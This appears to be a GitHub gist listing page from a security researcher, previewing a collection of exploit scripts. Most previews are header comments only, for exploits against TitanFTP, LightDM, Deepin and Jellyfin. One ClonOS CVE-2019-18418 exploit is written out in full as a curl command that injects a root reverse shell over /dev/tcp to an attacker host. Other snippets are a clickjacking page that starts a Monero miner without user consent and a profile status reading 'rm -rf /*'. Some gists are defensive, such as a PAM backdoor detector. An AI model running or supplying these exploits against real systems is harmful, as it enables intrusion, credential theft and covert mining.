Skip to content

Instantly share code, notes, and snippets.

View bcoles's full-sized avatar
💭
`rm -rf /*`

bcoles

💭
`rm -rf /*`
View GitHub Profile
@bcoles
bcoles / linux-pam-backdoor-detect.sh
Created September 13, 2020 13:40
Detect PAM backdoors created by linux-pam-backdoor
#!/bin/bash
# Detect PAM backdoors created by linux-pam-backdoor:
# https://github.com/zephrax/linux-pam-backdoor
#
# Note: this will likely only work with PAM version 1.3.0.
# ---
# $ ./backdoor.sh -v 1.3.0 -p some_s3cr3t_p455word
# Automatic PAM Backdoor
# PAM Version: 1.3.0
# Password: some_s3cr3t_p455word
@bcoles
bcoles / titanftp-server-admin-event-handler-rce
Last active March 22, 2020 04:19
titanftp-server-admin-event-handler-rce - TitanFTP Server Administrator Event Handler Authenticated RCE
#!/bin/bash
# titanftp-server-admin-event-handler-rce - TitanFTP Server Administrator Event Handler Authenticated RCE
#
# Requires remote administration interface to be enabled. (Default port 31001/tcp).
# Creates a new server and adds an event handler to execute a PowerShell reverse shell.
# ---
# $ ./titanftp-server-admin-event-handler-rce
# TitanFTP Server Administrator Event Handler Authenticated RCE
#
# Generating PowerShell reverse shell to 172.16.191.165:1337 ...
@bcoles
bcoles / clonos-root-rce.sh
Last active November 4, 2019 13:30
Trivial ClonOs remote root RCE exploit for CVE-2019-18418
#!/bin/bash
# clonos-root-rce
# Trivial ClonOs remote root RCE exploit for CVE-2019-18418 discovered by İbrahim Hakan Şeker
# Note: Start netcat listener on LHOST:LPORT first
RHOST="172.16.191.240"
LHOST="172.16.191.165"
LPORT=1337
curl "http://${RHOST}/json.php" -H "X-Requested-With: XMLHttpRequest" -d "mode=jailAdd&path=/&form_data[jname]=\`sudo /usr/local/bin/cbsd bash -c \"0<%26118-;exec 118<>/dev/tcp/${LHOST}/${LPORT};sh <%26118 >%26118 2>%26118\"\`"
@bcoles
bcoles / jellyfin-brute.rb
Created August 21, 2019 16:02
Jellyfin Password Reset PIN Brute Force
#!/usr/bin/env ruby
################################################################################
# Jellyfin Password Reset PIN Brute Force #
# #
# Usually completes within a few minutes. Tested on Jellyfin version 10.2.2. #
# This will likely also work on Emby Media Server, but untested. #
# #
# Note: cURL must be installed and in $PATH #
# #
# Note: Upon successful expoitation, the password will be reset for all users, #
@bcoles
bcoles / lightdmpwn.sh
Created September 19, 2018 08:36
Ubuntu LightDM Guest Account Local Privilege Escalation (CVE-2017-7358)
#!/bin/bash
# Ubuntu LightDM Guest Account Local Privilege Escalation (CVE-2017-7358)
# ---
# Usage: ./lightpwn
# A LightDM session is required. Exploitation will lock the current session,
# and could take several minutes. It usually takes about a minute.
# When the screen stops flashing, unlock the session and run: /bin/subash
# ---
# There's nothing new or special about this exploit.
# It's simply a slightly more weaponised version of the original PoC,
@bcoles
bcoles / lastore-daemon-root.sh
Created March 24, 2018 22:39
Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit
#!/bin/bash
# Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit
#
# The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any user
# in the sudo group to install arbitrary packages without providing a password,
# resulting in code execution as root. By default, the first user created on
# the system is a member of the sudo group.
# ~ bcoles
#
# Based on exploit by King's Way: https://www.exploit-db.com/exploits/39433/
@bcoles
bcoles / lightdmdump
Created March 11, 2018 05:57
Dump clear text passwords from lightdm sessions on Ubuntu
#!/bin/bash
# lightdmdump
# ---
# Dump clear text passwords from lightdm sessions on Ubuntu
# Requires root privileges to dump lightdm process memory
# Tested on Ubuntu 14.04.1 LTS and 16.04.4 LTS
# ---
# Bug discovered by: Sven Blumenstein
# Disclosure date: 2017-09-15
# Source: https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1717490
@bcoles
bcoles / crt.sh
Created March 8, 2018 11:07
List sub-domains using crt.sh
#!/bin/bash
# List sub-domains using crt.sh
set -euo pipefail
IFS=$'\n\t'
error() {
echo "[ERROR] $*"
exit 1
}
@bcoles
bcoles / fuzz.rb
Created November 18, 2017 05:16
Fuzz Origami Ruby gem with mutated PDF files
#!/usr/bin/env ruby
###################################################
# ----------------------------------------------- #
# Fuzz Origami Ruby gem with mutated PDF files #
# ----------------------------------------------- #
# #
# Each test case is written to 'fuzz.pdf' in the #
# current working directory. #
# #
# Crashes and the associated backtrace are saved #
@bcoles
bcoles / clickjack-authedmine.html
Created October 21, 2017 19:32
Start the AuthedMine JavaScript Monero miner without user consent (using clickjacking)
<html>
<body>
<div id="container" style="border:0;margin:0;position:absolute;width:5px;height:5px;overflow:hidden;cursor:pointer;opacity:0.01">
<iframe style="position:absolute;border:0;width:5px;height:100px;top:-85px;cursor:pointer;" src="https://authedmine.com/media/miner.html?key=your_public_key"></iframe>
</div>
</body>
<script>
window.onmousemove = function(e) {
var container = document.getElementById("container");